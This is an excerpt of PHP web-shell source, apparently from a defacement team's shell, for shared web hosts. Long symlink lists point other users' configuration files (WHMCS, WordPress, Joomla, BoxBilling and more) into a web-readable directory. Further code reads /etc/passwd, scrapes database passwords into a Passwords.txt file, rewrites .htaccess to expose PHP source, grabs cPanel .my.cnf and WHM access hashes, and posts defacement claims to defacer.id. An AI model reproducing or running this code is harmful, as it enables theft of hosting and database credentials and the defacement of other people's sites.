2587. @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
2588. @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
2589. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
2590. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
2591. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
2592. @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
2593. @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
2594. @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
2595. @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
2596. @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
2597. @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
2598. @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
2599. @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
2600. @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
2601. @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
2602. @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
2603. @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
2604. @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
2605. @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
2606. @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
2607. @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
2608. @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
2609. @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
2610. @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
2611. @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
2612. @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
2613. @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
2614. @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
2615. @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
2616. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
2617. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
2618. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
2619. @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
2620. @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
2621. @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
2622. @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
2623. @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
2624. @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
2625. @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
2626. @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
2627. @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
2628. @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
2629. @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
2630. @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
2631. @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
2632. @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
2633. @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
2634. @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
2635. @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
2636. @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
2637. @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
2638. @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
2639. @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
2640. @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
2641. @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
2642. @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
2643. @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
2644. @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
2645. @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
2646. @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
2647. @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
2648. @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
2649. @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
2650. @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
2651. @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
2652. @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
2653. @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
2654. @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
2655. @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
2656. @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
2657. @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
2658. @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
2659. @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
2660. @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
2661. @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
2662. @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
2663. @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
2664. @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
2665. @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
2666. @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
2667. @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
2668. @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
2669. @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
2670.  
2671. }
2672.  
2673. //password grab
2674.  
2675. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
2676. {
2677.  
2678. $ar0=explode($marqueurDebutLien, $text);
2679. $ar1=explode($marqueurFinLien, $ar0[1]);
2680. $ar=trim($ar1[0]);
2681. return $ar;
2682. }
2683.  
2684. $ffile=fopen('Passwords.txt','a+');
2685.  
2686.  
2687. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/bad_symconf/";
2688. $re=$r;
2689. $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt");
2690.  
2691. $users=file("/etc/passwd");
2692. foreach($users as $user)
2693. {
2694.  
2695. $str=explode(":",$user);
2696. $usersss=$str[0];
2697. foreach($confi as $co)
2698. {
2699.  
2700.  
2701. $uurl=$re.$usersss.$co;
2702. $uel=$uurl;
2703.  
2704. $ch = curl_init();
2705.  
2706. curl_setopt($ch, CURLOPT_URL, $uel);
2707. curl_setopt($ch, CURLOPT_HEADER, 1);
2708. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2709. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
2710. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
2711. $result['EXE'] = curl_exec($ch);
2712. curl_close($ch);
2713. $uxl=$result['EXE'];
2714.  
2715.  
2716. if($uxl && preg_match('/table_prefix/i',$uxl))
2717. {
2718.  
2719. //Wordpress
2720.  
2721. $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
2722. if(!empty($dbp))
2723. $pass=$dbp."\n";
2724. fwrite($ffile,$pass);
2725.  
2726. }
2727. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
2728. {
2729.  
2730. //WHMCS
2731.  
2732. $dbp=entre2v2($uxl,"db_password = '","';");
2733. if(!empty($dbp))
2734. $pass=$dbp."\n";
2735. fwrite($ffile,$pass);
2736.  
2737. }
2738.  
2739.  
2740. elseif($uxl && preg_match('/dbprefix/i',$uxl))
2741. {
2742.  
2743. //Joomla
2744.  
2745. $db=entre2v2($uxl,"password = '","';");
2746. if(!empty($db))
2747. $pass=$db."\n";
2748. fwrite($ffile,$pass);
2749. }
2750. elseif($uxl && preg_match('/admincpdir/i',$uxl))
2751. {
2752.  
2753. //Vbulletin
2754.  
2755. $db=entre2v2($uxl,"password'] = '","';");
2756. if(!empty($db))
2757. $pass=$db."\n";
2758. fwrite($ffile,$pass);
2759.  
2760. }
2761. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
2762. {
2763.  
2764. //Other
2765.  
2766. $db=entre2v2($uxl,"DB_PASSWORD', '","');");
2767. if(!empty($db))
2768. $pass=$db."\n";
2769. fwrite($ffile,$pass);
2770. }
2771. elseif($uxl && preg_match('/dbpass/i',$uxl))
2772. {
2773.  
2774. //Other
2775.  
2776. $db=entre2v2($uxl,"dbpass = '","';");
2777. if(!empty($db))
2778. $pass=$db."\n";
2779. fwrite($ffile,$pass);
2780. }
2781. elseif($uxl && preg_match('/dbpass/i',$uxl))
2782. {
2783.  
2784. //Other
2785.  
2786. $db=entre2v2($uxl,"dbpass = '","';");
2787. if(!empty($db))
2788. $pass=$db."\n";
2789. fwrite($ffile,$pass);
2790.  
2791. }
2792. elseif($uxl && preg_match('/dbpass/i',$uxl))
2793. {
2794.  
2795. //Other
2796.  
2797. $db=entre2v2($uxl,"dbpass = \"","\";");
2798. if(!empty($db))
2799. $pass=$db."\n";
2800. fwrite($ffile,$pass);
2801. }
2802.  
2803.  
2804. }
2805. }
2806. echo "<center>
2807. <a href=\"bad_symconf/root/\">Root Server</a>
2808. <br><a href=\"bad_symconf/Passwords.txt\">Passwords</a>
2809. <br><a href=\"bad_symconf/\">Configurations</a></center>";
2810. }
2811. else
2812. {
2813. echo "<center>
2814. <form method=\"POST\">
2815. <textarea name=\"passwd\" class='area' rows='15' cols='60'>";
2816. $file = '/etc/passwd';
2817. $read = @fopen($file, 'r');
2818. if ($read){
2819. $body = @fread($read, @filesize($file));
2820. echo "".htmlentities($body)."";
2821. }
2822. elseif(!$read)
2823. {
2824. $read = @show_source($file) ;
2825. }
2826. elseif(!$read)
2827. {
2828. $read = @highlight_file($file);
2829. }
2830. elseif(!$read)
2831. {
2832. for($uid=0;$uid<1000;$uid++)
2833. {
2834. $ara = posix_getpwuid($uid);
2835. if (!empty($ara))
2836. {
2837. while (list ($key, $val) = each($ara))
2838. {
2839. print "$val:";
2840. }
2841. print "\n";
2842. }}}
2843.  
2844. flush();
2845.  
2846. echo "</textarea>
2847. <p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\"/></p>
2848. </form></center>";
2849. }
2850. }
2851. }
2852. elseif($_GET['do'] == 'symlink') {
2853. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
2854. $d0mains = @file("/etc/named.conf");
2855. ##httaces
2856. if($d0mains){
2857. @mkdir("bad_sym",0777);
2858. @chdir("bad_sym");
2859. @exe("ln -s / root");
2860. $file3 = 'Options Indexes FollowSymLinks
2861. DirectoryIndex Hallucination.htm
2862. AddType text/plain .php
2863. AddHandler text/plain .php
2864. Satisfy Any';
2865. $fp3 = fopen('.htaccess','w');
2866. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
2867. echo "
2868. <table align=center border=1 style='width:60%;border-color:#333333;'>
2869. <tr>
2870. <td align=center><font size=2>S. No.</font></td>
2871. <td align=center><font size=2>Domains</font></td>
2872. <td align=center><font size=2>Users</font></td>
2873. <td align=center><font size=2>Symlink</font></td>
2874. </tr>";
2875. $dcount = 1;
2876. foreach($d0mains as $d0main){
2877. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
2878. flush();
2879. if(strlen(trim($domains[1][0])) > 2){
2880. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2881. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
2882. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
2883. <td>".$user['name']."</td>
2884. <td><a href='$full/bad_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
2885. flush();
2886. $dcount++;}}}
2887. echo "</table>";
2888. }else{
2889. $TEST=@file('/etc/passwd');
2890. if ($TEST){
2891. @mkdir("bad_sym",0777);
2892. @chdir("bad_sym");
2893. exe("ln -s / root");
2894. $file3 = 'Options Indexes FollowSymLinks
2895. DirectoryIndex Hallucination.htm
2896. AddType text/plain .php
2897. AddHandler text/plain .php
2898. Satisfy Any';
2899.  $fp3 = fopen('.htaccess','w');
2900.  $fw3 = fwrite($fp3,$file3);
2901.  @fclose($fp3);
2902.  echo "
2903. <table align=center border=1><tr>
2904. <td align=center><font size=3>S. No.</font></td>
2905. <td align=center><font size=3>Users</font></td>
2906. <td align=center><font size=3>Symlink</font></td></tr>";
2907.  $dcount = 1;
2908.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
2909.  while(!feof($file)){
2910.  $s = fgets($file);
2911.  $matches = array();
2912.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2913.  $matches = str_replace("home/","",$matches[1]);
2914.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2915.  continue;
2916.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
2917. <td align=center><font class=txt>" . $matches . "</td>";
2918.  echo "<td align=center><font class=txt><a href=$full/bad_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2919.  $dcount++;}fclose($file);
2920.  echo "</table>";}else{if($os != "Windows"){@mkdir("bad_sym",0777);@chdir("bad_sym");@exe("ln -s / root");$file3 = '
2921. Options Indexes FollowSymLinks
2922. DirectoryIndex Hallucination
2923. AddType text/plain .php
2924. AddHandler text/plain .php
2925. Satisfy Any
2926. ';
2927.  $fp3 = fopen('.htaccess','w');
2928.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
2929.  echo "
2930. <center><h2 class='k2ll33d2'>Symlink Server</h2>
2931. <table align=center border=1><tr>
2932. <td align=center><font size=3>ID</font></td>
2933. <td align=center><font size=3>Users</font></td>
2934. <td align=center><font size=3>Symlink</font></td></tr>";
2935.  $temp = "";$val1 = 0;$val2 = 1000;
2936.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
2937.  if ($uid)$temp .= join(':',$uid)."\n";}
2938.  echo '<br/>';$temp = trim($temp);$file5 =
2939.  fopen("test.txt","w");
2940.  fputs($file5,$temp);
2941.  fclose($file5);$dcount = 1;$file =
2942.  fopen("test.txt", "r") or exit("Unable to open file!");
2943.  while(!feof($file)){$s = fgets($file);$matches = array();
2944.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
2945.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2946.  continue;
2947.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
2948. <td align=center><font class=txt>" . $matches . "</td>";
2949.  echo "<td align=center><font class=txt><a href=$full/bad_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2950.  $dcount++;}
2951.  fclose($file);
2952.  echo "</table></div></center>";unlink("test.txt");
2953.  } else
2954.  echo "<center><font size=3>Cannot create Symlink</font></center>";
2955.  }
2956.  }    
2957. }
2958. elseif($_GET['do'] == 'defacerid') {
2959. echo "<center><form method='post'>
2960.         <u>Defacer</u>: <br>
2961.         <input type='text' name='hekel' size='50' value='Hallucination'><br>
2962.         <u>Team</u>: <br>
2963.         <input type='text' name='tim' size='50' value='Noob Exploiter Security Team'><br>
2964.         <u>Domains</u>: <br>
2965.         <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
2966.         <input type='submit' name='go' value='Submit' style='width: 450px;'>
2967.         </form>";
2968. $site = explode("\r\n", $_POST['sites']);
2969. $go = $_POST['go'];
2970. $hekel = $_POST['hekel'];
2971. $tim = $_POST['tim'];
2972. if($go) {
2973. foreach($site as $sites) {
2974. $zh = $sites;
2975. $form_url = "https://www.defacer.id/notify";
2976. $data_to_post = array();
2977. $data_to_post['attacker'] = "$hekel";
2978. $data_to_post['team'] = "$tim";
2979. $data_to_post['poc'] = 'SQL Injection';
2980. $data_to_post['url'] = "$zh";
2981. $curl = curl_init();
2982. curl_setopt($curl,CURLOPT_URL, $form_url);
2983. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
2984. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
2985. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
2986. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
2987. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
2988. $result = curl_exec($curl);
2989. echo $result;
2990. curl_close($curl);
2991. echo "<br>";
2992. }
2993. }
2994. }
2995.  
2996. elseif($_GET['do'] == 'config') {
2997.     if($_POST){
2998.         $passwd = $_POST['passwd'];
2999.         mkdir("bad_config", 0777);
3000.         $isi_htc = "Options all\nRequire None\nSatisfy Any";
3001.         $htc = fopen("bad_config/.htaccess","w");
3002.         fwrite($htc, $isi_htc);
3003.         preg_match_all('/(.*?):x:/', $passwd, $user_config);
3004.         foreach($user_config[1] as $user_bad) {
3005.             $user_config_dir = "/home/$user_bad/public_html/";
3006.             if(is_readable($user_config_dir)) {
3007.                 $grab_config = array(
3008.                                         "/home/$user_bad/.my.cnf" => "cpanel",
3009.                     "/home/$user_bad/.accesshash" => "WHM-accesshash",
3010.                     "/home/$user_bad/public_html/bw-configs/config.ini" => "BosWeb",
3011.                     "/home/$user_bad/public_html/config/koneksi.php" => "Lokomedia",
3012.                     "/home/$user_bad/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
3013.                     "/home/$user_bad/public_html/clientarea/configuration.php" => "WHMCS",             
3014.                     "/home/$user_bad/public_html/whmcs/configuration.php" => "WHMCS",
3015.                     "/home/$user_bad/public_html/forum/config.php" => "phpBB",
3016.                     "/home/$user_bad/public_html/sites/default/settings.php" => "Drupal",
3017.                     "/home/$user_bad/public_html/config/settings.inc.php" => "PrestaShop",
3018.                     "/home/$user_bad/public_html/app/etc/local.xml" => "Magento",
3019.                     "/home/$user_bad/public_html/admin/config.php" => "OpenCart",
3020.                     "/home/$user_bad/public_html/slconfig.php" => "Sitelok",
3021.                     "/home/$user_bad/public_html/application/config/database.php" => "Ellislab",                   
3022.                     "/home/$user_bad/public_html/whm/configuration.php" => "WHMCS",
3023.                     "/home/$user_bad/public_html/whmc/WHM/configuration.ph" => "WHMC",
3024.                     "/home/$user_bad/public_html/central/configuration.php" => "WHM Central",
3025.                     "/home/$user_bad/public_html/whm/WHMCS/configuration.php" => "WHMCS",
3026.                     "/home/$user_bad/public_html/whm/whmcs/configuration.php" => "WHMCS",
3027.                     "/home/$user_bad/public_html/submitticket.php" => "WHMCS",                                     
3028.                     "/home/$user_bad/public_html/configuration.php" => "Joomla",                   
3029.                     "/home/$user_bad/public_html/Joomla/configuration.php" => "JoomlaJoomla",
3030.                     "/home/$user_bad/public_html/joomla/configuration.php" => "JoomlaJoomla",
3031.                     "/home/$user_bad/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",      
3032.                     "/home/$user_bad/public_html/Home/configuration.php" => "JoomlaHome",
3033.                     "/home/$user_bad/public_html/HOME/configuration.php" => "JoomlaHome",
3034.                     "/home/$user_bad/public_html/home/configuration.php" => "JoomlaHome",
3035.                     "/home/$user_bad/public_html/NEW/configuration.php" => "JoomlaNew",
3036.                     "/home/$user_bad/public_html/New/configuration.php" => "JoomlaNew",
3037.                     "/home/$user_bad/public_html/new/configuration.php" => "JoomlaNew",
3038.                     "/home/$user_bad/public_html/News/configuration.php" => "JoomlaNews",
3039.                     "/home/$user_bad/public_html/NEWS/configuration.php" => "JoomlaNews",
3040.                     "/home/$user_bad/public_html/news/configuration.php" => "JoomlaNews",
3041.                     "/home/$user_bad/public_html/Cms/configuration.php" => "JoomlaCms",
3042.                     "/home/$user_bad/public_html/CMS/configuration.php" => "JoomlaCms",
3043.                     "/home/$user_bad/public_html/cms/configuration.php" => "JoomlaCms",
3044.                     "/home/$user_bad/public_html/Main/configuration.php" => "JoomlaMain",
3045.                     "/home/$user_bad/public_html/MAIN/configuration.php" => "JoomlaMain",
3046.                     "/home/$user_bad/public_html/main/configuration.php" => "JoomlaMain",
3047.                     "/home/$user_bad/public_html/Blog/configuration.php" => "JoomlaBlog",
3048.                     "/home/$user_bad/public_html/BLOG/configuration.php" => "JoomlaBlog",
3049.                     "/home/$user_bad/public_html/blog/configuration.php" => "JoomlaBlog",
3050.                     "/home/$user_bad/public_html/Blogs/configuration.php" => "JoomlaBlogs",
3051.                     "/home/$user_bad/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
3052.                     "/home/$user_bad/public_html/blogs/configuration.php" => "JoomlaBlogs",
3053.                     "/home/$user_bad/public_html/beta/configuration.php" => "JoomlaBeta",
3054.                     "/home/$user_bad/public_html/Beta/configuration.php" => "JoomlaBeta",
3055.                     "/home/$user_bad/public_html/BETA/configuration.php" => "JoomlaBeta",
3056.                     "/home/$user_bad/public_html/PRESS/configuration.php" => "JoomlaPress",
3057.                     "/home/$user_bad/public_html/Press/configuration.php" => "JoomlaPress",
3058.                     "/home/$user_bad/public_html/press/configuration.php" => "JoomlaPress",
3059.                     "/home/$user_bad/public_html/Wp/configuration.php" => "JoomlaWp",
3060.                     "/home/$user_bad/public_html/wp/configuration.php" => "JoomlaWp",
3061.                     "/home/$user_bad/public_html/WP/configuration.php" => "JoomlaWP",
3062.                     "/home/$user_bad/public_html/portal/configuration.php" => "JoomlaPortal",
3063.                     "/home/$user_bad/public_html/PORTAL/configuration.php" => "JoomlaPortal",
3064.                     "/home/$user_bad/public_html/Portal/configuration.php" => "JoomlaPortal",                  
3065.                     "/home/$user_bad/public_html/wp-config.php" => "WordPress",
3066.                     "/home/$user_bad/public_html/wordpress/wp-config.php" => "WordPressWordpress",
3067.                     "/home/$user_bad/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
3068.                     "/home/$user_bad/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",     
3069.                     "/home/$user_bad/public_html/Home/wp-config.php" => "WordPressHome",
3070.                     "/home/$user_bad/public_html/HOME/wp-config.php" => "WordPressHome",
3071.                     "/home/$user_bad/public_html/home/wp-config.php" => "WordPressHome",
3072.                     "/home/$user_bad/public_html/NEW/wp-config.php" => "WordPressNew",
3073.                     "/home/$user_bad/public_html/New/wp-config.php" => "WordPressNew",
3074.                     "/home/$user_bad/public_html/new/wp-config.php" => "WordPressNew",
3075.                     "/home/$user_bad/public_html/News/wp-config.php" => "WordPressNews",
3076.                     "/home/$user_bad/public_html/NEWS/wp-config.php" => "WordPressNews",
3077.                     "/home/$user_bad/public_html/news/wp-config.php" => "WordPressNews",
3078.                     "/home/$user_bad/public_html/Cms/wp-config.php" => "WordPressCms",
3079.                     "/home/$user_bad/public_html/CMS/wp-config.php" => "WordPressCms",
3080.                     "/home/$user_bad/public_html/cms/wp-config.php" => "WordPressCms",
3081.                     "/home/$user_bad/public_html/Main/wp-config.php" => "WordPressMain",
3082.                     "/home/$user_bad/public_html/MAIN/wp-config.php" => "WordPressMain",
3083.                     "/home/$user_bad/public_html/main/wp-config.php" => "WordPressMain",
3084.                     "/home/$user_bad/public_html/Blog/wp-config.php" => "WordPressBlog",
3085.                     "/home/$user_bad/public_html/BLOG/wp-config.php" => "WordPressBlog",
3086.                     "/home/$user_bad/public_html/blog/wp-config.php" => "WordPressBlog",
3087.                     "/home/$user_bad/public_html/Blogs/wp-config.php" => "WordPressBlogs",
3088.                     "/home/$user_bad/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
3089.                     "/home/$user_bad/public_html/blogs/wp-config.php" => "WordPressBlogs",
3090.                     "/home/$user_bad/public_html/beta/wp-config.php" => "WordPressBeta",
3091.                     "/home/$user_bad/public_html/Beta/wp-config.php" => "WordPressBeta",
3092.                     "/home/$user_bad/public_html/BETA/wp-config.php" => "WordPressBeta",
3093.                     "/home/$user_bad/public_html/PRESS/wp-config.php" => "WordPressPress",
3094.                     "/home/$user_bad/public_html/Press/wp-config.php" => "WordPressPress",
3095.                     "/home/$user_bad/public_html/press/wp-config.php" => "WordPressPress",
3096.                     "/home/$user_bad/public_html/Wp/wp-config.php" => "WordPressWp",
3097.                     "/home/$user_bad/public_html/wp/wp-config.php" => "WordPressWp",
3098.                     "/home/$user_bad/public_html/WP/wp-config.php" => "WordPressWP",
3099.                     "/home/$user_bad/public_html/portal/wp-config.php" => "WordPressPortal",
3100.                     "/home/$user_bad/public_html/PORTAL/wp-config.php" => "WordPressPortal",
3101.                     "/home/$user_bad/public_html/Portal/wp-config.php" => "WordPressPortal",
3102.                                         "/home1/$user_bad/.my.cnf" => "cpanel",
3103.                     "/home1/$user_bad/.accesshash" => "WHM-accesshash",
3104.                     "/home1/$user_bad/public_html/bw-configs/config.ini" => "BosWeb",
3105.                     "/home1/$user_bad/public_html/config/koneksi.php" => "Lokomedia",
3106.                     "/home1/$user_bad/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
3107.                     "/home1/$user_bad/public_html/clientarea/configuration.php" => "WHMCS",            
3108.                     "/home1/$user_bad/public_html/whmcs/configuration.php" => "WHMCS",
3109.                     "/home1/$user_bad/public_html/forum/config.php" => "phpBB",
3110.                     "/home1/$user_bad/public_html/sites/default/settings.php" => "Drupal",
3111.                     "/home1/$user_bad/public_html/config/settings.inc.php" => "PrestaShop",
3112.                     "/home1/$user_bad/public_html/app/etc/local.xml" => "Magento",
3113.                     "/home1/$user_bad/public_html/admin/config.php" => "OpenCart",
3114.                     "/home1/$user_bad/public_html/slconfig.php" => "Sitelok",
3115.                     "/home1/$user_bad/public_html/application/config/database.php" => "Ellislab",                  
3116.                     "/home1/$user_bad/public_html/whm/configuration.php" => "WHMCS",
3117.                     "/home1/$user_bad/public_html/whmc/WHM/configuration.ph" => "WHMC",
3118.                     "/home1/$user_bad/public_html/central/configuration.php" => "WHM Central",
3119.                     "/home1/$user_bad/public_html/whm/WHMCS/configuration.php" => "WHMCS",
3120.                     "/home1/$user_bad/public_html/whm/whmcs/configuration.php" => "WHMCS",
3121.                     "/home1/$user_bad/public_html/submitticket.php" => "WHMCS",                                    
3122.                     "/home1/$user_bad/public_html/configuration.php" => "Joomla",                  
3123.                     "/home1/$user_bad/public_html/Joomla/configuration.php" => "JoomlaJoomla",
3124.                     "/home1/$user_bad/public_html/joomla/configuration.php" => "JoomlaJoomla",
